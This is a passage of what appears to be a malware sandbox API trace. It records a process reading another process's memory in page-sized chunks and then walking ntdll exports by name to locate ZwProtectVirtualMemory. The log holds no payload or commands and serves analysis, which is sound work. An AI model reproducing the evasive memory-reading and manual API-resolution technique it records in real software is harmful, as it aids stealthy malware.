0x0 [0144.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9f000, Buffer=0x7ffb, BufferSize=0xb2f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba0000, Buffer=0x7ffb, BufferSize=0xb30000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba1000, Buffer=0x7ffb, BufferSize=0xb31000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.672] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba2000, Buffer=0x7ffb, BufferSize=0xb32000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.672] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba3000, Buffer=0x7ffb, BufferSize=0xb33000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.672] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba4000, Buffer=0x7ffb, BufferSize=0xb34000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.672] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba5000, Buffer=0x7ffb, BufferSize=0xb35000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba6000, Buffer=0x7ffb, BufferSize=0xb36000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba7000, Buffer=0x7ffb, BufferSize=0xb37000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.673] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba8000, Buffer=0x7ffb, BufferSize=0xb38000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba9000, Buffer=0x7ffb, BufferSize=0xb39000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baa000, Buffer=0x7ffb, BufferSize=0xb3a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bab000, Buffer=0x7ffb, BufferSize=0xb3b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.674] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bac000, Buffer=0x7ffb, BufferSize=0xb3c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bad000, Buffer=0x7ffb, BufferSize=0xb3d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bae000, Buffer=0x7ffb, BufferSize=0xb3e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baf000, Buffer=0x7ffb, BufferSize=0xb3f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.675] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb0000, Buffer=0x7ffb, BufferSize=0xb40000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb1000, Buffer=0x7ffb, BufferSize=0xb41000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb2000, Buffer=0x7ffb, BufferSize=0xb42000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.694] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb3000, Buffer=0x7ffb, BufferSize=0xb43000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.726] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb4000, Buffer=0x7ffb, BufferSize=0xb44000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.726] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb5000, Buffer=0x7ffb, BufferSize=0xb45000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.726] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb6000, Buffer=0x7ffb, BufferSize=0xb46000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.726] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb7000, Buffer=0x7ffb, BufferSize=0xb47000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.727] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb8000, Buffer=0x7ffb, BufferSize=0xb48000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.727] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb9000, Buffer=0x7ffb, BufferSize=0xb49000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.727] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bba000, Buffer=0x7ffb, BufferSize=0xb4a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.728] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbb000, Buffer=0x7ffb, BufferSize=0xb4b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.728] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbc000, Buffer=0x7ffb, BufferSize=0xb4c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.728] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbd000, Buffer=0x7ffb, BufferSize=0xb4d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.729] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbe000, Buffer=0x7ffb, BufferSize=0xb4e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.729] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbf000, Buffer=0x7ffb, BufferSize=0xb4f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.729] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc0000, Buffer=0x7ffb, BufferSize=0xb50000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.729] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc1000, Buffer=0x7ffb, BufferSize=0xb51000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.729] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc2000, Buffer=0x7ffb, BufferSize=0xb52000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.730] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc3000, Buffer=0x7ffb, BufferSize=0xb53000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.730] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc4000, Buffer=0x7ffb, BufferSize=0xb54000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.730] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc5000, Buffer=0x7ffb, BufferSize=0xb55000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.730] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc6000, Buffer=0x7ffb, BufferSize=0xb56000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.731] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc7000, Buffer=0x7ffb, BufferSize=0xb57000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.731] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc8000, Buffer=0x7ffb, BufferSize=0xb58000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.731] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc9000, Buffer=0x7ffb, BufferSize=0xb59000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.731] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bca000, Buffer=0x7ffb, BufferSize=0xb5a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.731] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcb000, Buffer=0x7ffb, BufferSize=0xb5b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.732] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcc000, Buffer=0x7ffb, BufferSize=0xb5c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.732] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcd000, Buffer=0x7ffb, BufferSize=0xb5d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.732] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bce000, Buffer=0x7ffb, BufferSize=0xb5e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.732] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcf000, Buffer=0x7ffb, BufferSize=0xb5f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.733] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd0000, Buffer=0x7ffb, BufferSize=0xb60000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.733] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd1000, Buffer=0x7ffb, BufferSize=0xb61000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.733] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd2000, Buffer=0x7ffb, BufferSize=0xb62000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.733] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd3000, Buffer=0x7ffb, BufferSize=0xb63000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.733] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd4000, Buffer=0x7ffb, BufferSize=0xb64000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.734] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd5000, Buffer=0x7ffb, BufferSize=0xb65000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.734] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd6000, Buffer=0x7ffb, BufferSize=0xb66000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.734] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd7000, Buffer=0x7ffb, BufferSize=0xb67000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.734] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd8000, Buffer=0x7ffb, BufferSize=0xb68000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.734] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd9000, Buffer=0x7ffb, BufferSize=0xb69000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.735] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bda000, Buffer=0x7ffb, BufferSize=0xb6a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.735] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdb000, Buffer=0x7ffb, BufferSize=0xb6b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.735] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdc000, Buffer=0x7ffb, BufferSize=0xb6c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.735] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdd000, Buffer=0x7ffb, BufferSize=0xb6d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.736] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bde000, Buffer=0x7ffb, BufferSize=0xb6e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.736] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdf000, Buffer=0x7ffb, BufferSize=0xb6f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.736] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be0000, Buffer=0x7ffb, BufferSize=0xb70000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.736] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be1000, Buffer=0x7ffb, BufferSize=0xb71000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.737] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be2000, Buffer=0x7ffb, BufferSize=0xb72000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.737] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be3000, Buffer=0x7ffb, BufferSize=0xb73000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.737] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be4000, Buffer=0x7ffb, BufferSize=0xb74000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.737] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be5000, Buffer=0x7ffb, BufferSize=0xb75000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.738] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be6000, Buffer=0x7ffb, BufferSize=0xb76000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.738] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be7000, Buffer=0x7ffb, BufferSize=0xb77000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.738] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be8000, Buffer=0x7ffb, BufferSize=0xb78000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.738] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be9000, Buffer=0x7ffb, BufferSize=0xb79000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.738] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bea000, Buffer=0x7ffb, BufferSize=0xb7a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.739] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28beb000, Buffer=0x7ffb, BufferSize=0xb7b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.739] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bec000, Buffer=0x7ffb, BufferSize=0xb7c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.839] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwProtectVirtualMemory") returned -1 [0144.839] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwProtectVirtualMemory") returned -1 [0144.839] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwProtectVirtualMemory") returned -1 [0144.839] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwProtectVirtualMemory") returned -1 [0144.839] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0144.839] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0144.839] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0144.840] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgPrint", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0144.841] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwProtectVirtualMemory") returned -1 [0144.842] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwTraceMessage", 